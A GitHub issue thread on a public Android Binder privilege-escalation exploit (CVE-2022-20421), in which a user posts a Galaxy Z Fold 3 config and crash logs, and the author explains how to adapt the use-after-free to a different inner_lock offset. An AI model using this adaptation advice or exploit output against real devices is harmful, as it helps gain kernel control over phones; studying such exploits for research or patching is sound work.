0xkol / badspin

Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)
MIT License
226 stars 32 forks source link

Support Inner_Lock offset 512 #6

Closed diabl0w closed 1 year ago

diabl0w commented 1 year ago

I am trying the exploit on Galaxy Z Fold 3.

In the research paper, it is stated:

For the rest of the exploit we will use the dup2() func-
tion to reach this allocation. Using this method we can
support inner_lock offsets ≥ 512. This is acceptable for
us, as we did not encountered a smaller offset. Otherwise,
we would have used the fork() method

I am getting the following error:

[x] Found binder_proc's inner_lock offset: 512 (vuln_fd 64)

[x] Unsupported inner_lock offset: Must be >= 520 and aligned to 8.
[x] Exit.
diabl0w commented 1 year ago
device_configs[] = {
    {
        /* RP1A.200720.012.F926USQU1AUG8 */
        .name = "Galaxy Z Fold 3",
        .model = "SM-F926U",
        .android_version = 11,
        .android_security_patch.year = 2021,
        .android_security_patch.month = 7,
        .kernel_version = KERNEL_VERSION(5, 4, 61),
        .ram_offset = 0x28000000UL,
        .kimg_to_lm = samsung_kimg_to_lm,
        .find_kbase = scan_kbase,
    }
};

Attempting to override the inner_lock offset check results in device crashing... the code always crashes on first 'iteration' using ram offset of 0x28000000UL or 0x0:

==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[17282:17282] New binder client: A
[17284:17284] New binder client: C
[17283:17283] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
B: Destroying
B: Finish. 
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
***CRASH***

I am using the Galaxy Z Fold 3, but the ram_offset used was based on one of the default configs already provided in the code for Samsung Galaxy S22 (0x28000000UL). I downloaded the firmware for that device and double checked using unmkbootimg to find ram_offset, but unmkbootimg gave me an output of of 0x20000000, so I'm not sure how the default configuration arrived at it's value. I checked my device's boot.img and it gave the same output of 0x20000000. Out of curiosity, I tried setting ram offset to 0x02000000 for libbadspin (although I'm not sure it was correct to do that) and it did yield different output:

==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[18396:18396] New binder client: C
[18394:18394] New binder client: A
[18395:18395] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Searching for magic badcab1ebadcab1e....
B: Destroying
B: Finish. 
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
    Testing ptmx 0 (fd 5)
        Reading ptmx 0
    Testing ptmx 1 (fd 6)
        Reading ptmx 1
    Testing ptmx 2 (fd 7)
        Reading ptmx 2
    Testing ptmx 3 (fd 8)
        Reading ptmx 3
    Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
    Joining blocker threads...
    All blocker threads joined.
offsetof(inner_lock, binder_proc) = 512
[x] Found binder_proc's inner_lock offset: 512 (vuln_fd 64)

[graveyard_process] pid = 18455
[pipe_process:18456] Pinned to CPU 0
[pipe_process:18457] Pinned to CPU 1
[pipe_process:18458] Pinned to CPU 2
[pipe_process:18460] Pinned to CPU 4
[pipe_process:18459] Pinned to CPU 3
[pipe_process:18462] Pinned to CPU 6
[pipe_process:18461] Pinned to CPU 5
[pipe_process:18463] Pinned to CPU 7
[fd_master_process] pid = 18466
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:18524] 30000 files sprayed
[shaper_process:18520] 30000 files sprayed
[shaper_process:18523] 30000 files sprayed
[shaper_process:18521] 30000 files sprayed
[shaper_process:18522] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=18526
[timer_master_process] Wait for C to enter spin_lock()
[18527:18527] New binder client: A
[18528:18528] New binder client: B
[18529:18529] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish. 
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done
***CRASH***
0xkol commented 1 year ago

Hey, in practice it is possible to support such offset 512. However currently the exploit enters spin_lock() when the memory location already has been freed, and from my experiment, on offset 512 there's a garbage value (not 0x00000041), hence the crash. To adapt the exploit to offset 512 you need to enter spin_lock() when the memory is allocated as tty write buffer and then play with the timer threads. I did not pursue this in the current exploit.

diabl0w commented 1 year ago

Hey, in practice it is possible to support such offset 512. However currently the exploit enters spin_lock() when the memory location already has been freed, and from my experiment, on offset 512 there's a garbage value (not 0x00000041), hence the crash. To adapt the exploit to offset 512 you need to enter spin_lock() when the memory is allocated as tty write buffer and then play with the timer threads. I did not pursue this in the current exploit.

thank you for the response... I suppose I will close this as I certainly am not skilled enough to adapt this. I am still struggling to even determine proper ramdisk_offset lol. I may revisit another time, or try a firmware change and see if that gets me the proper inner_offset

diabl0w commented 1 year ago

Hey, in practice it is possible to support such offset 512. However currently the exploit enters spin_lock() when the memory location already has been freed, and from my experiment, on offset 512 there's a garbage value (not 0x00000041), hence the crash. To adapt the exploit to offset 512 you need to enter spin_lock() when the memory is allocated as tty write buffer and then play with the timer threads. I did not pursue this in the current exploit.

do you know how I can obtain the ramdisk_offset value without permissions to read /proc/iomem?